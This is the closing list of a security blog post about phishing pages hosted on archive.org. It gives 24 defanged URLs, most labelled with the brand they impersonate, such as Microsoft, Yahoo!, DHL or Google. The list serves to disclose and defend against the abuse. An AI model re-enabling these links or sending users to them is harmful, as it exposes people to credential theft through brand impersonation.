    hxxps://archive.org/download/ihgoiybot/ihgoiybot.html (Microsoft)
    hxxps://archive.org/download/dfhrf/dfhrf.html (Microsoft)
    hxxps://archive.org/download/pontiffdata_yahoo_Kgfk_201701/kgfk.html (Microsoft)
    hxxps://archive.org/download/jhlhj/jhlhj.html (Yahoo!)
    hxxps://archive.org/download/pontiffdata_yahoo_Kgfk/kgfk.html (Microsoft)
    hxxps://archive.org/download/pontiffdata_yahoo_Gege/gege.html (Microsoft)
    hxxps://archive.org/download/him8ouh/him8ouh.html (DHL)
    hxxps://archive.org/download/maiikillll/maiikillll.html (Google)
    hxxps://archive.org/download/pontiffdata_yahoo_Mlv/mlv;.html (Microsoft)
    hxxps://archive.org/download/oiopo_201701/oiopo.html (Microsoft)
    hxxps://archive.org/download/ircyily/ircyily.html (Microsoft)
    hxxps://archive.org/download/vuyvii/vuyvii.html (DHL)
    hxxps://archive.org/download/fcvbt_201612/fcvbt.html (Microsoft)
    hxxps://archive.org/download/poksfcps/poksfcps.html (Yahoo!)
    hxxps://archive.org/download/tretr_201612/tretr.html
    hxxps://archive.org/download/eldotrivoloto_201612/eldotrivoloto.html (Microsoft)
    hxxps://archive.org/download/babalito_201612/babalito.html (Microsoft)
    hxxps://archive.org/download/katolito_201612/katolito.html (Microsoft)
    hxxps://archive.org/download/kingshotties_201612/kingshotties.html (Microsoft)
    hxxps://archive.org/download/fcvbt/fcvbt.html (Microsoft)
    hxxps://archive.org/download/vkvkk/vkvkk.html (DHL)
    hxxps://archive.org/download/pontiffdata_yahoo_Vkm/vkm;.html (Microsoft)
    hxxps://archive.org/download/hiluoogi/hiluoogi.html (Microsoft)
    hxxps://archive.org/download/ipiojlj/ipiojlj.html (Microsoft)

    [The post Archive.org Abused to Deliver Phishing Pages has been first published on /dev/random]
